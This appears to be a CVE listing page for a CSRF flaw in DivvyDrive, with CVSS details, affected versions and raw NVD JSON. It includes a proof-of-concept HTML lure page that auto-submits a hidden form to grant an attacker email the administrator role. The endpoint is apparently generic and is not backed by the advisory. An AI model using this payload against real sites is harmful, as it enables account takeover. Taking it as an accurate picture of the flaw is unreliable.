Security Vulnerability Report
中文
CVE-2026-5791 CVSS 6.5 MEDIUM

CVE-2026-5791

Published: 2026-05-07 13:16:14
Last Modified: 2026-05-10 16:16:07

Description

Cross-Site request forgery (CSRF) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross Site Request Forgery. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

DivvyDrive 4.8.2.9
DivvyDrive < 4.8.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-5791 --> <!-- This HTML demonstrates the CSRF vulnerability by simulating a settings change --> <html> <body> <h1>Congratulations! You won a prize.</h1> <!-- Malicious form targeting a vulnerable DivvyDrive endpoint --> <form action="http://target-divvydrive-url/api/update_settings" method="POST"> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="role" value="administrator" /> <input type="submit" value="Claim Prize" /> </form> <script> // Automatically submit the form when the page loads document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5791", "sourceIdentifier": "[email protected]", "published": "2026-05-07T13:16:13.647", "lastModified": "2026-05-10T16:16:07.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site request forgery (CSRF) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross Site Request Forgery.\n\nThis issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182", "source": "[email protected]"}]}}